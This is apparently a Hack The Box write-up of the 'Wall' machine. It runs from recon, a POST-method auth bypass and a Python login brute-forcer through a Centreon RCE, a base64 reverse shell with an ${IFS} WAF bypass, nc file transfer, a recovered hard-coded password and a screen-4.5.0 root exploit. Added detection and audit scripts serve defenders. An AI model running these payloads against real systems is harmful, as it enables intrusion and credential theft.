This article is intended solely for technical exchange, study and research. Using the techniques in it for illegal purposes or for causing damage is strictly prohibited; the author bears no responsibility for any consequences that result.

The target is a retired box run with the author's VIP subscription; its IP address shows as 10.10.10.157.

This time https://github.com/Tib3rius/AutoRecon is used for automated, all-round scanning.
Information enumeration and collection. https://github.com/codingo/Reconnoitre is similar to autorecon.

autorecon 10.10.10.157 -o ./Wall-autorecon

sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.157

or

sudo masscan -p1-65535,U:1-65535 10.10.10.157 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
sudo nmap -Pn -sV -sC -p$ports 10.10.10.157

Visiting port 80 on the IP shows the default Apache page, so brute-force the directories:

sudo gobuster dir -u http://10.10.10.157 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
The directory found, /monitoring, returns a 401 authentication prompt. Testing shows that changing the request method to POST bypasses the authentication. Based on the information displayed, http://10.10.10.157/centreon is reachable and shows a login page. Centreon is a distributed monitoring system; see https://www.cnblogs.com/flytor/p/11440809.html for reference.

Change the request method to POST.

The response is 200, and the message hints at a URL path, /centreon. Replay it with a normal GET request and take a look.

It shows a login form. A quick web search confirms Centreon is a monitoring system, and it ships with the default credentials admin/centreon.

See https://www.tenable.com/plugins/nessus/80225. Logging in with this default account fails, though. Looking at the captured request in Burp Suite, Centreon's login form carries a centreon_token, and the token attached to each request is different, so a conventional replay brute force does not work. It can be brute-forced with Python code, or with Burp Suite's macro feature; here I used Python.

The password dictionary used for brute forcing:

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-passwords-shortlist.txt

The Python brute-force code:
#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup

url = 'http://10.10.10.157/centreon/index.php'
s = requests.session()  # one session so the PHPSESSID cookie persists between the GET and the POST

def sendRequests(username, password):
    # fetch the login page first: every rendered form carries a fresh centreon_token
    page = s.get(url)
    soup = BeautifulSoup(page.content, 'html.parser')
    token = soup.find('input', attrs={'name': 'centreon_token'})['value']
    data = {
        'useralias': username,
        'password': password,
        'submitLogin': 'Connect',
        'centreon_token': token
    }
    response = s.post(url, data=data)
    # a failed login echoes an "incorrect" message back on the page
    if 'incorrect' not in response.text:
        print("Credentials found {}:{}".format(username, password))

with open('top-passwords-shortlist.txt') as wordlist:
    for word in wordlist:
        password = word.rstrip()
        print("[*] Trying {}".format(password))
        sendRequests('admin', password)
Here is the execution result:

kali@kali:~/Downloads/htb/wall$ python3 centreon.py
[*] Trying password
[*] Trying 123456
[*] Trying 12345678
[*] Trying abc123
[*] Trying querty
[*] Trying monkey
[*] Trying letmein
[*] Trying dragon
[*] Trying 111111
[*] Trying baseball
[*] Trying iloveyou
[*] Trying trustno1
[*] Trying 1234567
[*] Trying sunshine
[*] Trying master
[*] Trying 123123
[*] Trying welcome
[*] Trying shadow
[*] Trying ashley
[*] Trying footbal
[*] Trying jesus
[*] Trying michael
[*] Trying ninja
[*] Trying mustang
[*] Trying password1
Credentials found admin:password1
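Two things in the steps above leave clear traces in the web server's access log: the per-method authentication gap on /monitoring (GET answered 401, POST answered 200) and the scripted login loop against /centreon/index.php, which the per-request centreon_token does nothing to slow down. The following is an added example, not code from the write-up or from Centreon, that runs both checks over constructed Apache combined-format log lines; the log format, the sample lines, the 60-second window and the threshold of 10 are assumptions to adjust to the real server.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" LogFormat (assumption: adjust the regex if the server uses a custom format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one GET->401 / POST->200 pair on the protected directory,
# one ordinary user on the Centreon login page, and a scripted run of 25 login POSTs
# from a single client within 25 seconds.
SAMPLE_LOG = [
    '10.10.14.16 - - [05/Jun/2021:10:00:01 +0000] "GET /monitoring/ HTTP/1.1" 401 460 "-" "curl/7.74.0"',
    '10.10.14.16 - - [05/Jun/2021:10:00:05 +0000] "POST /monitoring/ HTTP/1.1" 200 512 "-" "curl/7.74.0"',
    '10.10.14.50 - - [05/Jun/2021:10:01:00 +0000] "GET /centreon/index.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '10.10.14.50 - - [05/Jun/2021:10:01:09 +0000] "POST /centreon/index.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
] + [
    f'10.10.14.16 - - [05/Jun/2021:10:02:{i:02d} +0000] "POST /centreon/index.php HTTP/1.1" 200 4120 "-" "python-requests/2.25.1"'
    for i in range(25)
]


def parse_access_log(lines):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        entries.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"],
            "status": int(m["status"]),
        })
    return entries


def method_bypass_candidates(entries):
    """Paths that answered GET with 401 but served some other method with 2xx.
    This is the signature of an auth rule written per method (<Limit GET>) rather
    than for every method (<LimitExcept>). Returns {path: [methods]}."""
    denied_get = set()
    served_other = defaultdict(set)
    for e in entries:
        if e["method"] == "GET" and e["status"] == 401:
            denied_get.add(e["path"])
        elif e["method"] != "GET" and 200 <= e["status"] < 300:
            served_other[e["path"]].add(e["method"])
    return {p: sorted(methods) for p, methods in served_other.items() if p in denied_get}


def login_bruteforce_candidates(entries, login_path, window_seconds=60, threshold=10):
    """Clients whose peak number of POSTs to login_path inside any window of
    window_seconds reaches threshold. A CSRF token per request stops naive replay
    but not a scripted loop, so request rate is the signal. Returns {ip: peak}."""
    per_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"] == login_path:
            per_ip[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        peak, start = 0, 0
        for end, t in enumerate(stamps):  # sliding window over sorted timestamps
            while (t - stamps[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    entries = parse_access_log(SAMPLE_LOG)
    print("method bypass:", method_bypass_candidates(entries))
    print("login brute force:", login_bruteforce_candidates(entries, "/centreon/index.php"))
```

The first check only fires for a path where both the 401 and the 2xx are observed, so it will not catch the misconfiguration until someone tries it; the lasting fix is to apply the authentication directive to all methods. The second check reports the peak rate, which is what an account lockout or a rate limit on the login endpoint should be tuned against.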
According to the blog post, to execute commands you need to send a POST request to the URI below with the body parameters attached.

The requested URI:

/centreon/include/configuration/configGenerate/xml/generateFiles.php

Blog post: https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/

The exact request:
POST http://10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php HTTP/1.1
Host: 10.10.10.157
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.157
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.157/centreon/main.get.php?p=60901&o=c&server_id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=16f08s82qv7rui4vjdm8hbr6jc
Connection: close

debug=true&generate=true&poller=1
The response shows that the id command executed successfully. Next, set up a reverse shell via base64; testing shows there is a WAF, which is bypassed with ${IFS}.
echo 'bash -i >& /dev/tcp/10.10.14.16/8833 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNi84ODMzIDA+JjEK
Configure the reverse-shell payload in Centreon:
echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNi84ODMzIDA+JjEK|base64${IFS}-d|bash;
Then replay the request in Burp Suite to trigger the reverse shell.

Collecting information on the target, a backup file named backup is found.

Transfer this backup file to the local Kali box:

kali: nc -lvnp 9933 > backup.tgz
target: nc 10.10.14.16 9933 < /opt/.shelby/backup

The backup file on the target is Python bytecode and can be decompiled with uncompyle6.

Install: sudo pip3 install uncompyle6
Decompile: uncompyle6 backup.pyc
kali@kali:~/Downloads/htb/wall$ uncompyle6 backup.pyc
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.5 (default, Aug 2 2020, 15:09:07)
# [GCC 10.2.0]
# Embedded file name: backup.py
# Compiled at: 2019-07-30 22:38:22
import paramiko
username = 'shelby'
host = 'wall.htb'
port = 22
transport = paramiko.Transport((host, port))
password = ''
password += chr(ord('S'))
password += chr(ord('h'))
password += chr(ord('e'))
password += chr(ord('l'))
password += chr(ord('b'))
password += chr(ord('y'))
password += chr(ord('P'))
password += chr(ord('a'))
password += chr(ord('s'))
password += chr(ord('s'))
password += chr(ord('w'))
password += chr(ord('@'))
password += chr(ord('r'))
password += chr(ord('d'))
password += chr(ord('I'))
password += chr(ord('s'))
password += chr(ord('S'))
password += chr(ord('t'))
password += chr(ord('r'))
password += chr(ord('o'))
password += chr(ord('n'))
password += chr(ord('g'))
password += chr(ord('!'))
transport.connect(username=username, password=password)
sftp_client = paramiko.SFTPClient.from_transport(transport)
sftp_client.put('/var/www/html.zip', 'html.zip')
print '[+] Done !'
# okay decompiling backup.pyc
Based on the decompiled code above, extract the password directly in an interactive Python session:

kali@kali:~/Downloads/htb/wall$ python
Python 2.7.18 (default, Apr 20 2020, 20:30:41)
[GCC 9.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> password = ''
>>> password += chr(ord('S'))
>>> password += chr(ord('h'))
>>> password += chr(ord('e'))
>>> password += chr(ord('l'))
>>> password += chr(ord('b'))
>>> password += chr(ord('y'))
>>> password += chr(ord('P'))
>>> password += chr(ord('a'))
>>> password += chr(ord('s'))
>>> password += chr(ord('s'))
>>> password += chr(ord('w'))
>>> password += chr(ord('@'))
>>> password += chr(ord('r'))
>>> password += chr(ord('d'))
>>> password += chr(ord('I'))
>>> password += chr(ord('s'))
>>> password += chr(ord('S'))
>>> password += chr(ord('t'))
>>> password += chr(ord('r'))
>>> password += chr(ord('o'))
>>> password += chr(ord('n'))
>>> password += chr(ord('g'))
>>> password += chr(ord('!'))
>>> password
'ShelbyPassw@rdIsStrong!'
>>>
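The chr(ord('x')) chain in backup.py is an obfuscation of a hard-coded credential, and pasting decompiled code into an interpreter to read it is not something to do with an untrusted file. The same value can be recovered statically: fold the constant expressions in the AST without running anything, then flag string variables whose names look like secrets, which is how a code-review or repository scan would catch this file before it shipped. The following is an added example, not from the write-up or any scanner; the sample source mirrors the decompiled pattern with a placeholder secret (assumption: "Example!Secret", not the box's real password), and the list of secret-like variable names is an assumption too. Note that ast.parse needs Python 3 syntax, so the Python 2 print statement in the real decompiled file must be converted first.

```python
import ast
import re

UNKNOWN = object()                     # sentinel: value could not be folded statically
SAFE_FUNCS = {"chr": chr, "ord": ord}  # pure builtins worth folding; nothing else is ever called

# Constructed sample that mirrors the decompiled backup.py pattern; the secret is a placeholder.
PLACEHOLDER = "Example!Secret"
SAMPLE_SOURCE = (
    "import paramiko\n"
    "username = 'shelby'\n"
    "host = 'wall.htb'\n"
    "port = 22\n"
    "transport = paramiko.Transport((host, port))\n"
    "password = ''\n"
    + "".join(f"password += chr(ord({c!r}))\n" for c in PLACEHOLDER)
    + "transport.connect(username=username, password=password)\n"
)

# Variable names that suggest a credential (assumption; extend for your code base).
SECRET_NAME_RE = re.compile(r"pass|pwd|secret|token|key", re.IGNORECASE)


def _fold(node, env):
    """Evaluate an expression made of str/int literals, already-known names, '+'
    and chr()/ord() calls without executing the program; UNKNOWN for anything else."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (str, int)):
        return node.value
    if isinstance(node, ast.Name):
        return env.get(node.id, UNKNOWN)
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = _fold(node.left, env), _fold(node.right, env)
        if left is UNKNOWN or right is UNKNOWN or type(left) is not type(right):
            return UNKNOWN
        return left + right
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id in SAFE_FUNCS and not node.keywords):
        args = [_fold(a, env) for a in node.args]
        if any(a is UNKNOWN for a in args):
            return UNKNOWN
        try:
            return SAFE_FUNCS[node.func.id](*args)
        except (TypeError, ValueError):
            return UNKNOWN
    return UNKNOWN


def recover_string_constants(source):
    """Walk top-level assignments in order and return every name whose final value
    folds to a string. Attribute calls, I/O and the like stay UNKNOWN and are dropped."""
    env = {}
    for stmt in ast.parse(source).body:
        if (isinstance(stmt, ast.Assign) and len(stmt.targets) == 1
                and isinstance(stmt.targets[0], ast.Name)):
            env[stmt.targets[0].id] = _fold(stmt.value, env)
        elif (isinstance(stmt, ast.AugAssign) and isinstance(stmt.op, ast.Add)
                and isinstance(stmt.target, ast.Name)):
            # password += chr(ord('x')): concatenate onto the value tracked so far
            current = env.get(stmt.target.id, UNKNOWN)
            increment = _fold(stmt.value, env)
            if current is UNKNOWN or increment is UNKNOWN or type(current) is not type(increment):
                env[stmt.target.id] = UNKNOWN
            else:
                env[stmt.target.id] = current + increment
    return {name: value for name, value in env.items() if isinstance(value, str)}


def find_hardcoded_secrets(source):
    """Recovered string constants whose variable name suggests a credential."""
    return {name: value for name, value in recover_string_constants(source).items()
            if SECRET_NAME_RE.search(name)}


if __name__ == "__main__":
    for name, value in find_hardcoded_secrets(SAMPLE_SOURCE).items():
        print(f"hard-coded secret in variable {name!r}: {value!r}")
```

The folder deliberately refuses anything it does not understand (attribute calls, other builtins, keyword arguments), so it can be pointed at arbitrary decompiled output without side effects; the price is that it only sees obfuscation built from concatenation and chr/ord, which is exactly the pattern on this box.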
Use this password, ShelbyPassw@rdIsStrong!, to SSH straight into the target:

sshpass -p 'ShelbyPassw@rdIsStrong!' ssh -oStrictHostKeyChecking=no shelby@10.10.10.157

After logging in successfully, look for binaries with the 4000 (set-uid) bit:

shelby@Wall:~$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/screen-4.5.0
/bin/fusermount
/bin/su
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/eject/dmcrypt-get-device
shelby@Wall:~$
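What makes /bin/screen-4.5.0 stand out in that list is that it is not part of the normal set-uid inventory of the distribution: every other entry is a standard system tool. An administrator can make that comparison automatic by recording the set-uid files of a freshly built image and diffing the live system against it. The following is an added example, not from the write-up; the baseline set is a constructed, illustrative list (it is the page's find output minus screen-4.5.0, not a vendor-published inventory), and the walker is a Python equivalent of find / -perm -4000.

```python
import os
import stat
import tempfile

# Constructed baseline: the set-uid files recorded on a freshly built image of this host
# (illustrative; record your own baseline from a known-good system).
BASELINE_SUID = {
    "/bin/mount", "/bin/ping", "/bin/fusermount", "/bin/su", "/bin/umount",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/gpasswd", "/usr/bin/traceroute6.iputils",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/sudo",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
    "/usr/lib/eject/dmcrypt-get-device",
}

# The find output from the target as listed in this write-up.
TARGET_FIND_OUTPUT = [
    "/bin/mount", "/bin/ping", "/bin/screen-4.5.0", "/bin/fusermount", "/bin/su", "/bin/umount",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/gpasswd", "/usr/bin/traceroute6.iputils",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/sudo",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
    "/usr/lib/eject/dmcrypt-get-device",
]


def find_suid_files(root):
    """Equivalent of `find root -perm -4000`: walk the tree without following
    symlinks and return the regular files carrying the set-uid bit, sorted."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so a symlink's target mode is never counted
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_suid(found, baseline=BASELINE_SUID):
    """Set-uid files present on the system but absent from the baseline: these need review."""
    return sorted(set(found) - set(baseline))


def missing_suid(found, baseline=BASELINE_SUID):
    """Baseline entries no longer set-uid: usually a removed package, worth knowing too."""
    return sorted(set(baseline) - set(found))


def make_demo_tree():
    """Constructed fixture: a throwaway directory holding one set-uid file and one
    ordinary file. Returns (root, [expected set-uid paths])."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    os.makedirs(os.path.join(root, "usr", "bin"))
    suid_path = os.path.join(root, "usr", "bin", "screen-4.5.0")
    plain_path = os.path.join(root, "usr", "bin", "ls")
    for path in (suid_path, plain_path):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(suid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    return root, [suid_path]


if __name__ == "__main__":
    print("unexpected on target:", unexpected_suid(TARGET_FIND_OUTPUT))
    root, _ = make_demo_tree()
    print("set-uid files under demo tree:", find_suid_files(root))
```

Run the walker from cron or a configuration-management check and alert on a non-empty unexpected list; an unexpected set-uid binary is worth a look whether it was left by an attacker or by an administrator installing an old version of a tool by hand.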
The classic screen-4.5.0 vulnerability is present; it can be used to escalate directly to root.

https://www.exploit-db.com/exploits/41154

Download it, transfer it to the target and escalate to root:

wget https://www.exploit-db.com/raw/41154
dos2unix 41154
cp 41154 screenpwn.sh
scp screenpwn.sh shelby@10.10.10.157:/tmp/
chmod +x screenpwn.sh
./screenpwn.sh